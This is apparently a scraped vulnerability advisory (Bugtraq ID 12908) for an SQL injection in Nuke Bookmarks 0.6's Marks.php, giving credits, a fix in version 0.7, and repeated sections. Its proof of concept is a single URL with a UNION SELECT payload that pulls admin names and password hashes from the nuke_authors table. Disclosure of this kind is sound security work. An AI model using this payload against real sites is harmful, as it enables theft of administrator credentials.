Nuke Bookmarks Marks.php SQL Injection Vulnerability
BID:12908
Info
Nuke Bookmarks Marks.php SQL Injection Vulnerability
| Bugtraq ID: | 12908 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 26 2005 12:00AM |
| Updated: | Mar 26 2005 12:00AM |
| Credit: | Discovery credited to Gerardo Astharot Di Giacomo <[email protected]>. |
| Vulnerable: |
Nuke Bookmarks Nuke Bookmarks 0.6 |
| Not Vulnerable: | |
Discussion
Nuke Bookmarks Marks.php SQL Injection Vulnerability
Nuke Bookmarks is prone to an SQL injection vulnerability.
This vulnerability could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.
Nuke Bookmarks is prone to an SQL injection vulnerability.
This vulnerability could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.
Exploit / POC
Nuke Bookmarks Marks.php SQL Injection Vulnerability
No exploit code is required.
The following proof of concept was supplied:
http://www.nukesite.com/modules.php?name=Bookmarks&file=marks&catname=1&category=-1/**/union/**/select%200,aid,0,pwd,0,0%20from%20nuke_authors
No exploit code is required.
The following proof of concept was supplied:
http://www.nukesite.com/modules.php?name=Bookmarks&file=marks&catname=1&category=-1/**/union/**/select%200,aid,0,pwd,0,0%20from%20nuke_authors
Solution / Fix
Nuke Bookmarks Marks.php SQL Injection Vulnerability
Solution:
The vendor has addressed this issue in Nuke Bookmarks 0.7.
Nuke Bookmarks Nuke Bookmarks 0.6
Solution:
The vendor has addressed this issue in Nuke Bookmarks 0.7.
Nuke Bookmarks Nuke Bookmarks 0.6
-
Nuke Bookmarks Nuke Bookmarks 0.7
http://prdownloads.sourceforge.net/nukebookmarks/bookmarks-0.7.tgz?dow nload
References
Nuke Bookmarks Marks.php SQL Injection Vulnerability
References:
References:
- Home Page (Nuke Bookmarks)
- ZH2005-03SA -- multiple vulnerabilities in NukeBookmarks .6 (Gerardo Astharot Di Giacomo